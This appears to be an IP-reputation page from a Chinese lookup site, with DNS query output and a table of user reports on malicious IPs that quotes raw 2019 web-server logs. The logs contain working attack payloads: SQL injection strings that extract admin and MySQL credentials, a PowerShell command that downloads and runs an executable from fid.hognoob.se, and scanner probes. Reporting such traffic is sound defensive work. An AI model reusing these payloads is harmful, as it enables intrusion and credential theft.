城市(city): unknown
省份(region): unknown
国家(country): China
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 113.121.42.139
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 58880
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;113.121.42.139. IN A
;; AUTHORITY SECTION:
. 148 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022030302 1800 900 604800 86400
;; Query time: 75 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Mar 04 12:39:05 CST 2022
;; MSG SIZE rcvd: 107
Host 139.42.121.113.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 139.42.121.113.in-addr.arpa: NXDOMAIN
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 85.68.112.186 | botsattack | 85.68.112.186 - - [19/Apr/2019:04:39:13 +0800] "GET /xmlrpc.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" 85.68.112.186 - - [19/Apr/2019:04:39:14 +0800] "GET /xmlrpc.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" |
2019-04-19 04:40:01 |
| 61.160.195.187 | attack | 61.160.195.187 - - [21/Apr/2019:06:24:39 +0800] "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2, 3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C%27%60+&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-strea m&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1" 404 3409 "-" "-" 61.160.195.187 - - [21/Apr/2019:06:24:39 +0800] "GET /plus/recommend.php?aid=1&_FILES%5Btype%5D%5Bname%5D&_FILES%5Btype%5D%5Bsize%5D&_FILES%5Btype%5D%5Btype%5D&_FILES%5Btype%5D%5Btmp_name %5D=aa%5C'and+char(@%60'%60)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,Host,0x7C,user,0x3a,password,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20mysql.%60us er%60%23 HTTP/1.1" 404 538 "-" "-" |
2019-04-21 06:55:34 |
| 185.195.27.254 | botsattack | 185.195.27.254 - - [18/Apr/2019:06:11:46 +0800] "GET /wp2/wp-login.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 185.195.27.254 - - [18/Apr/2019:06:11:47 +0800] "GET /wp2/wp-login.php HTTP/1.1" 404 209 "http://118.25.52.138/wp2/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" |
2019-04-18 06:12:46 |
| 59.111.30.195 | attackproxy | 59.111.30.195 - - [24/Apr/2019:08:22:57 +0800] "\\x04\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" 400 182 "-" "-" 59.111.30.195 - - [24/Apr/2019:08:22:57 +0800] "\\x05\\x03\\x00\\x01\\x02" 400 182 "-" "-" 59.111.30.195 - - [24/Apr/2019:08:22:57 +0800] "GET http://baidu.com/ HTTP/1.1" 400 682 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" |
2019-04-24 08:57:51 |
| 123.206.22.203 | attack | 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /d7.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /rxr.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /1x.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /home.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /undx.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /spider.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" |
2019-04-19 14:00:22 |
| 14.17.3.65 | attack | 管理员账户攻击检测 14.17.3.65 - - [18/Apr/2019:07:03:49 +0800] "GET /administrator/index.php HTTP/1.1" 404 480 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Co re/UIWebView NetType/2G Mem/117" |
2019-04-18 08:10:32 |
| 89.248.172.90 | proxy | 89.248.172.90 - - [17/Apr/2019:14:10:41 +0800] "CONNECT dnspod.qcloud.com:443 HTTP/1.1" 405 519 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" |
2019-04-17 15:15:55 |
| 220.181.51.109 | bots | 没有百度UA的百度爬虫 220.181.51.109 - - [22/Apr/2019:08:09:25 +0800] "GET / HTTP/1.1" 200 105648 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36" |
2019-04-22 08:10:42 |
| 119.74.94.143 | bots | 119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/54.36.127.189 HTTP/1.1" 200 9821 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/222.186.10.54 HTTP/1.1" 200 9398 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/200.53.15.17 HTTP/1.1" 200 8618 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/123.206.44.225 HTTP/1.1" 200 8700 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/156.219.69.226 HTTP/1.1" 200 10018 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/35.200.107.73 HTTP/1.1" 200 9130 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" |
2019-04-23 14:44:49 |
| 103.106.148.207 | attack | 103.106.148.207 - - [23/Apr/2019:14:48:27 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.93.30 (KHTML, like Gecko) Version/5.3.8 Safari/531.75" |
2019-04-23 15:37:04 |
| 138.91.125.32 | bots | 138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET //xmlrpc.php?rsd HTTP/1.1" 308 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET / HTTP/1.1" 200 10302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 138.91.125.32 - - [23/Apr/2019:08:10:33 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 138.91.125.32 - - [23/Apr/2019:08:10:33 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" |
2019-04-23 08:11:21 |
| 54.36.127.189 | spambotsattackproxy | 54.36.127.189 - - [19/Apr/2019:14:22:46 +0800] "POST http://gp.snaware.com/judge2/?key=IOdfnl%2fCTnpe%2bgUsWXoxmtdrckp5zwGQDhDM88YeJX2aNAjy0XDwKxanFBTTiMXA&h=3Olzt8rgiM&f=false&t=555525 HTTP/1.1" 301 194 "gatherproxy.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; FDM)" 54.36.127.189 - - [19/Apr/2019:14:22:47 +0800] "CONNECT gp.snaware.com:443 HTTP/1.1" 400 182 "-" "-" |
2019-04-19 14:23:41 |
| 118.25.71.65 | attack | 118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-19 15:56:51 |
| 139.59.23.231 | attack | ZmEu是个phpMyAdmin脆弱性检查工具,可以发现phpMyAdmin的漏洞,从而进行攻击 139.59.23.231 - - [20/Apr/2019:10:24:06 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 498 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:07 +0800] "GET /phpMyAdmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:08 +0800] "GET /phpmyadmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 404 480 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /scripts/setup.php/index.php HTTP/1.1" 404 484 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:11 +0800] "GET HTTP/1.1" 400 0 "-" "-" 139.59.23.231 - - [20/Apr/2019:10:24:12 +0800] "GET HTTP/1.1" 400 0 "-" "-" |
2019-04-20 10:49:01 |
| 61.160.221.73 | attack | 61.160.221.73 - - [21/Apr/2019:04:15:36 +0800] "POST /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" 61.160.221.73 - - [21/Apr/2019:04:15:43 +0800] "GET /wp-login.php HTTP/1.1" 200 5456 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" 61.160.221.73 - - [21/Apr/2019:04:15:47 +0800] "POST /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" |
2019-04-21 06:59:39 |